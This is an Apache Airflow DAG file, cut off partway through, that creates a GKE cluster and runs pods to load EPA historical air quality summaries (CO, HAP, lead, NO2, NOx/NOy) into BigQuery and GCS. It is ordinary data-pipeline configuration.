arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.google.cloud.operators import kubernetes_engine
# Arguments inherited by every task in the DAG below.
default_args = dict(
    owner="Google",
    depends_on_past=False,
    start_date="2021-03-01",
)
with DAG(
dag_id="epa_historical_air_quality.epa_historical_air_quality",
default_args=default_args,
max_active_runs=1,
schedule_interval="0 1 * * 6",
catchup=False,
default_view="graph",
) as dag:
# Provision a temporary GKE cluster that hosts the CSV-transform pods for this DAG run.
# NOTE(review): 8 x e2-standard-16 nodes is a sizeable footprint — confirm sizing is intentional.
create_cluster = kubernetes_engine.GKECreateClusterOperator(
    task_id="create_cluster",
    project_id="{{ var.value.gcp_project }}",  # resolved from Airflow Variables at render time
    location="us-central1-c",
    body={
        "name": "epa-hist-air-quality",
        "initial_node_count": 8,
        "network": "{{ var.value.vpc_network }}",
        "node_config": {
            "machine_type": "e2-standard-16",
            # Node OAuth scopes: GCS read/write plus broad cloud-platform access for the workloads.
            "oauth_scopes": [
                "https://www.googleapis.com/auth/devstorage.read_write",
                "https://www.googleapis.com/auth/cloud-platform",
            ],
        },
    },
)
# Run CSV transform within kubernetes pod
annual_summaries = kubernetes_engine.GKEStartPodOperator(
task_id="annual_summaries",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.annual_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.annual_summary.table_id }}",
"YEAR_FIELD_NAME": "year",
"YEAR_FIELD_TYPE": "INT",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.annual_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.annual_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.annual_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - annual_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "metric_used", "method_name", "year", "units_of_measure",\n "event_type", "observation_count", "observation_percent", "completeness_indicator", "valid_day_count",\n "required_day_count", "exceptional_data_count", "null_data_count", "primary_exceedance_count", "secondary_exceedance_count",\n "certification_indicator", "num_obs_below_mdl", "arithmetic_mean", "arithmetic_standard_dev", "first_max_value",\n "first_max_datetime", "second_max_value", "second_max_datetime", "third_max_value", "third_max_datetime",\n "fourth_max_value", "fourth_max_datetime", "first_max_non_overlapping_value", "first_no_max_datetime", "second_max_non_overlapping_value",\n "second_no_max_datetime", "ninety_nine_percentile", "ninety_eight_percentile", "ninety_five_percentile", "ninety_percentile",\n "seventy_five_percentile", "fifty_percentile", "ten_percentile", "local_site_name", "address",\n "state_name", "county_name", "city_name", "cbsa_name", "date_of_last_change"]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "metric_used": "str", "method_name": "str", "year": "int32", "units_of_measure": "str",\n "event_type": "str", "observation_count": "int32", "observation_percent": "float64", "completeness_indicator": "str", "valid_day_count": "int32",\n "required_day_count": "int32", "exceptional_data_count": "int32", "null_data_count": "int32", "primary_exceedance_count": "str", "secondary_exceedance_count": "str",\n "certification_indicator": "str", "num_obs_below_mdl": "int32", "arithmetic_mean": "float64", "arithmetic_standard_dev": "float64", "first_max_value": "float64",\n "first_max_datetime": "datetime64[ns]", "second_max_value": "float64", "second_max_datetime": "datetime64[ns]", "third_max_value": "float64", "third_max_datetime": "datetime64[ns]",\n "fourth_max_value": "float64", "fourth_max_datetime": "datetime64[ns]", "first_max_non_overlapping_value": "float64", "first_no_max_datetime": "datetime64[ns]", "second_max_non_overlapping_value": "float64",\n "second_no_max_datetime": "datetime64[ns]", "ninety_nine_percentile": "float64", "ninety_eight_percentile": "float64", "ninety_five_percentile": "float64", "ninety_percentile": "float64",\n "seventy_five_percentile": "float64", "fifty_percentile": "float64", "ten_percentile": "float64", "local_site_name": "str", "address": "str",\n "state_name": "str", "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "metric_used", "method_name", "year", "units_of_measure",\n "event_type", "observation_count", "observation_percent", "completeness_indicator", "valid_day_count",\n "required_day_count", "exceptional_data_count", "null_data_count", "primary_exceedance_count", "secondary_exceedance_count",\n "certification_indicator", "num_obs_below_mdl", "arithmetic_mean", "arithmetic_standard_dev", "first_max_value",\n "first_max_datetime", "second_max_value", "second_max_datetime", "third_max_value", "third_max_datetime",\n "fourth_max_value", "fourth_max_datetime", "first_max_non_overlapping_value", "first_no_max_datetime", "second_max_non_overlapping_value",\n "second_no_max_datetime", "ninety_nine_percentile", "ninety_eight_percentile", "ninety_five_percentile", "ninety_percentile",\n "seventy_five_percentile", "fifty_percentile", "ten_percentile", "local_site_name", "address",\n "state_name", "county_name", "city_name", "cbsa_name", "date_of_last_change"]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
co_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="co_daily_summary",
startup_timeout_seconds=600,
name="load_co_daily_summary",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.co_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.co_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.co_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.co_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.co_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - co_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "str", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
# Pod task: download the CO hourly-summary source CSV, transform it, and load it to BigQuery/GCS.
# All SOURCE_URL/TABLE_ID/... values are Jinja-resolved from Airflow Variables at render time.
co_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="co_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",  # must match the cluster created by create_cluster
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.co_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.co_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.co_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.co_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.co_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - co_hourly_summaries",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code",\n "method_name", "state_name", "county_name", "date_of_last_change" ]',
        # NOTE(review): DATA_DTYPES omits "county_name" although both header lists include it,
        # and types latitude/longitude as "str" where the sibling tasks in this file use
        # "float64" — confirm with the transform container whether this is intentional
        # (a partial dtype mapping may be deliberate) or a copy/paste drift.
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "str", "longitude": "str", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]", "time_local": "str",\n "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "str", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "str", "qualifier": "str", "method_type": "str", "method_code": "str",\n "method_name": "str", "state_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code",\n "method_name", "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
hap_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="hap_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.hap_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.hap_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.hap_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.hap_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.hap_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - hap_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
hap_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="hap_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - hap_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
lead_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="lead_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.lead_daily_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.lead_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.lead_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.lead_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.lead_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - lead_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
no2_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="no2_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.no2_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.no2_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.no2_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.no2_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.no2_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - no2_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
no2_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="no2_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - no2_hourly",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
nonoxnoy_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="nonoxnoy_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - nonoxnoy_daily",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
nonoxnoy_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="nonoxnoy_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.table_id }}",
